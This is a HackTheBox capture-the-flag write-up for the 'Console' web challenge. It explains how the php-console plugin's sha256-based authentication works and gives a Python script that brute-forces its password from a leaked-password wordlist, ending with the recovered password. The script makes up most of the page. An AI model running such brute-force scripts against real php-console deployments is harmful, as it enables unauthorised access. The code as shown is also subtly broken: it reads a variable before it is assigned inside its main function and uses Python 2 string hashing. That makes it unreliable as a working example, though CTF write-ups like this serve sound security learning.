# HackTheBox - Console Googling leads us to this plugin: https://chrome.google.com/webstore/detail/php-console/nfhmhhlpfleoednkpnnnkolmclajemef Looking at the requests and code we can confirm it is using that plugin. The plugin uses multiple sha256 sums of the password for authentication. Source Code: https://github.com/barbushin/php-console We can simply copy the "publickey", it's just a hash of the IP and basic UID. For Simplicity's sake we just copy it. There is a field in the response headers `isSuccess` telling us if we successfully authenticated or not. I created a bruteforcing script that can be found below. ## Code ```python= import requests import json import base64 from hashlib import sha256 wordlist = open('/usr/share/seclists/Passwords/darkweb2017-top1000.txt') publickey = 'd1d58b2f732fd546d9507da275a71bddc0c2300a214af3f3f3a5f5f249fe275e' URL = 'http://docker.hackthebox.eu:31061/' pw = wordlist.readline().strip() def gen_token(pw): salt = 'NeverChangeIt:)' pw_hash = sha256(pw+salt).hexdigest() return sha256(pw_hash+publickey).hexdigest() def bf(): while pw: print(pw) data = {"php-console-client":5,"auth":{"publicKey":publickey,"token":gen_token(pw)}} cookies = {"php-console-client":base64.b64encode(json.dumps(data))} print(cookies) r = requests.post(URL,allow_redirects=False,cookies=cookies) #print(str(r.headers)) if not '"isSuccess":false' in str(r.headers): print("Password found: "+pw) print(r.headers) break pw = wordlist.readline().strip() bf() # Password found: poohbear ``` ###### tags: `CTF` `HTB` `Web`